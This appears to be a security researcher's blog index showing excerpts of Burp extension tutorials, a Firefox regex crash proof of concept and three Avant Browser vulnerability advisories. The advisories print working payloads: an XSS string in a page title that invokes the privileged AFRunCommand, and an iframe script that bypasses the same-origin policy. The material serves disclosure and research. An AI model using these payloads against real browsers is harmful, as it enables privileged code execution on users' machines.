Posts

BurpCSJ - Dealing with authentication

I have received many questions on how to properly handle authentication when using BurpCSJ, so here is a short tutorial on how to manage it. If you are looking for how to use this Burp extension, there is a basic tutorial as well. In this post, we are going to use BurpCSJ against the Altoro bank (a deliberately vulnerable web application), which is available online here: http://demo.testfire.net/ First, start clean (the reasons will be clear at the end of this tutorial):
- Start Burp;
- Start the browser and configure its proxy settings to work with Burp;
- Browse to the target site: http://demo.testfire.net/
- Perform login: user: jsmith - password: Demo1234
- Check the Burp cookie jar (under options/sessions); this should be populated with some cookies:
- Configure BurpCSJ (Crawljax tab) and make sure that "Use Manual Proxy" is ticked and pointing to Burp, and that the "Use cookie jar" option is ticked as well:
- Start/Launch Bur...

Crashing Firefox with Regular Expression

Recently, I found an interesting crash in Firefox and decided to investigate further. I Googled for it and it appears that the issue is already known and was reported a few months ago to Mozilla. However, the bug is not fixed yet (at least in FF 26) and, as a personal exercise, I decided to dig a little deeper and collect some notes which I am sharing in this blog post. Here is a brief analysis of what I have found, thanks also to the pointers given by my friend Andrzej Dereszowski. This is the crash PoC:
<html>
<head>
<script>
function main() {
  regexp = /(?!Z)r{2147483647,}M\d/;
  "A".match(regexp);
}
main();
</script>
</head>
<body>
</body>
</html>
Below, a windbg screenshot showing the crash on Firefox 25 / Windows 8.1 (64bit): At this stage, we can infer that an overflow occurred and, as a protective measure, FF decided to crash instead of gracefully handling the is...

BurpCSJ extension release

As part of my research and talk titled "Augmented Reality in your web proxy", presented during the HackPra AllStars program / OWASP AppSec EU 2013 security conference in Hamburg, I decided to release a new Burp Pro extension which integrates Crawljax, Selenium and JUnit. I took this approach to increase application spidering coverage (especially for Ajax web apps), speed up complex test cases and take advantage of the Burp Extender API. Downloads: BurpCSJ extension JAR - download (all dependencies included); BurpCSJ source code - github; "Augmented Reality in your web proxy" - presentation (slideshare). Getting started: Download BurpCSJ; load the BurpCSJ extension jar via the Extender tab; choose the URL item from any Burp tab (e.g. target, proxy history, repeater); right-click on the URL item; choose the menu item "Send URL to Crawljax"; Crawljax will automatically start crawling the URL that you chose. Tutorials ...

BurpCSJ Tutorial - Using Crawljax

This is a simple tutorial to get you started with BurpCSJ and Crawljax. Installation is easy: just download BurpCSJ and import it in Burp via the Extender tab, as shown below: Extender -> Add -> Choose File. Once the extension is loaded, two new tabs will appear on the right side. Start crawling: to start crawling, grab a URL item from any Burp tab (e.g. proxy history), right-click on the item and choose "Send to URL to Crawljax", as shown below. After this, a Crawljax session will start based on the settings configured via the Crawljax tab. It is always recommended to choose a web root URL item for Crawljax, e.g. http://yoursite.xxx/ instead of a specific page or folder. This is typically the URL that you have configured under Target/Scope in Burp. Crawling with a different browser: under the Crawljax tab, it is possible to configure the path to the browser drivers, proxy settings and other options for Crawljax. If you need to use a d...

Avant Browser - Stored Cross Site Scripting - Feed Reader (browser://localhost/lst?*)

Details Vendor Site: Avant browser (www.avantbrowser.com) Date: December 5, 2012 – CVE (TBA) Affected Software: Avant Browser Ultimate 2012 Build 28 and potentially previous versions Status: Unpatched Researcher: Roberto Suggi Liverani - @malerisch PDF version: Avant_multiple_vulnerabilities_advisory.pdf Stored Cross Site Scripting - Feed Reader (browser://localhost/lst?*) A malicious user can inject and store arbitrary JavaScript/HTML code via multiple RSS feed elements. The vulnerable elements are the following: <title> element: JavaScript injection using an HTML-encoded payload; <link> element: JavaScript injection using the javascript: pseudo-URI (this is rendered in the about:blank zone); <description> element: JavaScript injection using an HTML-encoded payload. The following table shows an example of a malicious RSS feed: <?xml version='1.0' encoding="ISO-8859-1"?> <rss version='2.0'> <channel> <...

Avant Browser - Cross Context Scripting - browser:home - Most Visited And History Tabs

Details Vendor Site: Avant browser (www.avantbrowser.com) Date: December 5, 2012 – CVE (TBA) Affected Software: Avant Browser Ultimate 2012 Build 27 and potentially previous versions Status: Unpatched Researcher: Roberto Suggi Liverani - @malerisch PDF version: Avant_multiple_vulnerabilities_advisory.pdf Cross Context Scripting – browser:home – Most Visited And History Tabs A malicious user can inject arbitrary JavaScript/HTML code through the websites visited with the Avant Browser. The injected code is rendered into both the Most Visited and History tabs within the browser:home page, which display the URL and the title of each visited page. A malicious user can inject and store JavaScript/HTML content by using the <title> HTML element, as shown in the table below:
<title>aaa"><img src=a onerror='var vstr = {value: ""};window.navigator.AFRunCommand(60003, vstr);alert(vstr.value);'></title>
The injected payload is render...

Avant Browser - Same of Origin Policy Bypass - browser:home

Details Vendor Site: Avant browser (www.avantbrowser.com) Date: December 5, 2012 – CVE (TBA) Affected Software: Avant Browser Ultimate 2012 Build 28 and potentially previous versions Status: Unpatched Researcher: Roberto Suggi Liverani - @malerisch PDF version: Avant_multiple_vulnerabilities_advisory.pdf Same of Origin Policy Bypass A malicious user can execute arbitrary JavaScript/HTML code on the privileged browser:home page from an untrusted web page on the Internet (http:// zone). This is possible by creating an iframe element pointing to the browser:home page and then invoking privileged commands using a window object reference to the iframe element, as shown in the example below:
<iframe name="test2" src="browser:home"></iframe>
<script>
window['test2'].navigator.AFRunCommand(id_of_privileged_command, vstr)
</script>
This code allows interaction from an untrusted zone (http://) to a trusted and priv...